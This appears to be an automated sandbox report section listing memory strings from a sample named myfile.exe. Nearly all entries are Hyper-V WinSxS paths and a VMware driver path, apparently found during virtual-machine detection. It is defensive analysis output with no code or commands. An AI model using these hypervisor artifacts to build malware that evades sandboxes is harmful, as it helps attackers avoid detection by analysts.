Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\r\
Source: myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\{
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\r\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\w
Source: myfile.exe, 00000000.00000003.1981576898.0000000002BFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\n
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\
Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\f\wd
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127\!
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\zq
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8\
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\3
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\r\:v
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd\BBW
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\r\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942004405.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\S
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\r\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790\O
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\r\
Source: myfile.exe, 00000000.00000003.1980534561.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987652819.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942504657.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981082622.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\jPY#
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\r\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\{
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\n\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981\
Source: myfile.exe, 00000000.00000003.2365373242.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382799050.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942004405.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a\O
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\r\
Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\a
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2\
Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\f\m
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\f\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\r\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\o
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\r\
Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\r\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942004405.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\L
Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf385
Source: myfile.exe, 00000000.00000003.2008810311.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: erStore\FileRepository\vmci.inf_amd64_68ed49469341f563\n
